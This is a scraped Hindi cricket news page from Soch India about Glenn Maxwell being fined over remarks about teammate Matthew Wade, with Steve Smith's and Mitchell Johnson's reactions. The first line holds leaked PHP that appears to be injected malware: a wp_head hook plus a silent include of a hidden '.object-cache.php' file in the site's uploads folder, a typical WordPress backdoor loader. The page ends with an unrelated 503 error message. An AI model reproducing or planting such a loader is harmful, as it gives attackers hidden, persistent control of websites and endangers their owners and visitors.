add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अपने बयान पर बुरे फंसे मैक्सेवल, लगा जुर्माना – SOCH INDIA
Menu

खेल
अपने बयान पर बुरे फंसे मैक्सेवल, लगा जुर्माना

nobanner

लंबे समय तक विश्व क्रिकेट पर राज करने वाली क्रिकेट ऑस्ट्रेलिया का हाल बेहाल है. टेस्ट सीरीज में लगातार हार के बाद खिलाड़ियों के बीच भी तालमेल बेहतर नहीं दिख रहा. अपने ही साथी खिलाड़ी के प्रति दुर्व्यवहार के कारण ऑस्ट्रेलियाई ऑलराउंडर ग्लैन मैक्सवेल पर जुर्माना लगाया गया है. इस बात की घोषणा खुद टीम के कप्तान स्टीवन स्मिथ ने की.

चैपल-हैडली सीरीज शुरु होने से पहले ऑस्ट्रेलियाई क्रिकेट की ये खबर इस बात को भी दर्शाती है कि टीम में सबकुछ ठीक नहीं चल रहा.  मैक्सवेल को न्यूजीलैंड के खिलाफ रविवार को होने वाले पहले मैच के लिए टीम में शामिल किया गया है.

मैक्सवेल ने गुरुवार को कहा था कि शेफील्ड शील्ड मैच में विक्टोरिया के लिए खेलते हुए टीम के विकेट कीपर कप्तान वेड के पीछे खेलना काफी दुखदायक है और इसीके कारण टेस्ट टीम में जगह नहीं मिली.

‘क्रिकेट डॉट कॉम डॉट एयू’ ने स्मिथ के हवाले से लिखा है, “हर कोई उनके इस बयान से निराश है. मैंने खुद उन्हें यह बात बताई है और टीम से बात की है.”

उन्होंने कहा, “हम हमेशा दूसरों को सम्मान देने की बात करते हैं, चाहे वो टीम के साथी हों, विपक्षी टीम हो, प्रशंसक हों या फिर मीडिया हो. मेरा मानना है कि उन्होंने जो कुछ भी कहा वह टीम के साथी के प्रति दुर्व्यवहार था.”

कप्तान के बयान के बाद टीम के पूर्व दिग्गज गेंदबाज मिचेल जॉनसन ने ट्वीट कर मैक्सवेल का समर्थन कर इस मुद्दे को बढ़ा दिया है. जॉनसन ने चैनल नाइन के ट्वीट को रिट्वीट कर अपनी बात कहते हुए कहा. ”एक बल्लेबाज के तौर पर उन्हें विकेटकीपर से पहले बल्लेबाजी करनी चाहिए. उन्होंने आगे लिखा कि ईमानदारी से उसने अपनी बात कही” ??

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.